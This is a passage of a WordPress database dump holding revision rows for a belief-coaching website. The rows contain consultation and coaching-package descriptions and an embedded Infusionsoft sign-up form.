(1093, 2, '2016-08-03 15:17:34', '2016-08-03 20:17:34', '', 'Free 15-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 15-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  Value: $100. ', 'inherit', 'closed', 'open', '', '100-autosave-v1', '', '', '2016-08-03 15:17:34', '2016-08-03 20:17:34', '', 100, 'http://clearyourbeliefs.com/100-autosave-v1', 0, 'revision', '', 0),
(1096, 2, '2014-06-25 16:41:45', '2014-06-25 21:41:45', '', 'Free 20-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 20-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.   ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 16:41:45', '2014-06-25 21:41:45', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1095, 2, '2014-06-25 16:39:21', '2014-06-25 21:39:21', '', 'Free 20-minute Consultation (FC)', 'Not sure if coaching is right for you?  Choose our free 20-minute consultation. One of our professional Clear Your Beliefs Coaches will answer your questions and give you a direct experience of the power of the process.  This is a demonstration – not a sales pitch. You''ll receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  You can extend your coaching session beyond 20 minutes at additional cost.  ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 16:39:21', '2014-06-25 21:39:21', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1094, 2, '2014-06-25 16:37:25', '2014-06-25 21:37:25', '', 'Free 20-minute Consultation (FC)', 'Not sure if coaching is right for you?  You can have a free 20-minute consultation with one of our professional Clear Your Beliefs Coaches, and get your questions answered.  You''ll get a direct experience of the power and professionalism our our coaching staff.  This is a demonstration – not a sales pitch. In addition, you''ll receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift just for trying it out.  If you decide to extend your coaching session beyond 20 minutes, you can choose to do so.  Your coach will charge your credit card at that time. ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 16:37:25', '2014-06-25 21:37:25', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1097, 2, '2014-06-25 16:42:25', '2014-06-25 21:42:25', '', 'Free 20-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 20-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  Value: $100. ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 16:42:25', '2014-06-25 21:42:25', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1098, 2, '2014-06-25 16:43:14', '2014-06-25 21:43:14', '', 'CYB Program + 3.5 hours of Coaching', 'In addition to everything listed above, you''ll receive 30 minutes of professional coaching by phone (or Skype) each week, from a Clear Your Beliefs Coach.  He or she will keep you on track, answer questions, guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $600.00.  ', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 16:43:14', '2014-06-25 21:43:14', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1099, 2, '2014-06-25 16:45:58', '2014-06-25 21:45:58', 'Get 60 min of coaching per week or per class', 'CYB Program + 7 hours of Coaching', 'In addition to the complete Clear Your Beliefs Program, you''ll receive seven hours of professional coaching (by phone or Skype) from a Clear Your Beliefs Coach.  He or she will guide you for an hour each week, taking you deep into your subconscious mind – deeper than you can go by yourself.   Value: $850.00.  ', 'inherit', 'closed', 'open', '', '99-revision-v1', '', '', '2014-06-25 16:45:58', '2014-06-25 21:45:58', '', 99, 'http://clearyourbeliefs.com/99-revision-v1', 0, 'revision', '', 0),
(1100, 4194, '2014-06-25 16:54:35', '2014-06-25 21:54:35', '<strong>Would you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" class="infusion-form" method="POST">\r\n\r\n    <input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" />\r\n\r\n    <input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" />\r\n\r\n    <input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_FirstName">First Name *</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_LastName">Last Name *</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_LastName" name="inf_field_LastName" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_City"> City</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_City" name="inf_field_City" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_State"> State</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_State" name="inf_field_State" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_Country"> Country</label>\r\n\r\n        <select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_custom_TimeZone" name="inf_custom_TimeZone" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_Email">Email *</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_field_Phone1">Phone Number</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_field_Phone1" name="inf_field_Phone1" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-field">\r\n\r\n        <label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n        <input class="infusion-field-input-container" id="inf_custom_Timetocontact" name="inf_custom_Timetocontact" type="text" />\r\n\r\n    </div>\r\n\r\n    <div class="infusion-submit">\r\n\r\n        <input type="submit" value="Submit" />\r\n\r\n    </div>\r\n\r\n</form></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 16:54:35', '2014-06-25 21:54:35', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1101, 2, '2014-06-25 17:41:30', '2014-06-25 22:41:30', '<h1 style="text-align: center;">Free 20-minute Consultation with a Clear Your Beliefs Coach</h1>\r\n<strong>\r\n\r\nWould you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nAs a gift, we''ll also send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After the 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after your 20-minute consultation. Please write to us at support@clearyourbeliefs.com.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" />\r\n\r\n<input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City"> City</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_State"> State</label>\r\n\r\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Country"> Country</label>\r\n\r\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\r\n\r\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 17:41:30', '2014-06-25 22:41:30', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1102, 2, '2014-06-25 17:42:08', '2014-06-25 22:42:08', '<h1 style="text-align: center;">Free 20-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether Clear Your Beliefs is right for you?\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nAs a gift, we''ll also send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n\r\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After the 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nWe''d love to get your feedback after your 20-minute consultation. Please write to us at support@clearyourbeliefs.com.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" 